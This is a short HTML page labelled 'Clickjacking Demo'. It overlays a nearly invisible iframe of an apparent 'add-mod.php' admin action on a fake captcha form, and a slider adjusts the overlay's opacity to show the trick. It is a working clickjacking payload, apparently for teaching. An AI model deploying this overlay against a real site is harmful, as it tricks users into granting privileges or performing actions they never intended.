<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Clickjacking Demo</title>
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
    
    <link rel="stylesheet" href="https://demo/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://demo/css/bootstrap-theme.min.css">

    <style>
        iframe {
            position: absolute;
            width: 100%;
            height: 100%;
            top: 15px;
            left: 274px;
            opacity: 0.2;
        }
        .jumbotron {
            text-align: center;
        }
        input.form-control {
            width: 170px;
            margin: 0.5em auto;
        }
        .opacity-control {
            position: absolute;
            width: 100%;
            bottom: 1em;
            text-align: center;
        }
    </style>
</head>

<body>
    <iframe src="https://demo/add-mod.php"></iframe>

    <div class="jumbotron">
        <div class="container">

            <form>
                <h2>Please solve the captcha to view this article</h2>
                <img src="captcha-example.jpg"><br>
                <input type="text" class="form-control">
                <button type="submit" class="btn btn-default">Submit</button>
            </form>

            <form class="opacity-control">
                <input type="range" id="opacity-input" class="form-control" min="0" max="100" value="10">
            </form>
        </div>
    </div>

    <script src="https://demo/js/jquery.min.js"></script>
    <script src="https://demo/js/bootstrap.min.js"></script>
    <script>
        $(document).ready(function() {
            $('#opacity-input').on('input', function() {
                $('iframe').css('opacity', ($('#opacity-input').val() / 100));
            });
        });
    </script>
</body>

</html>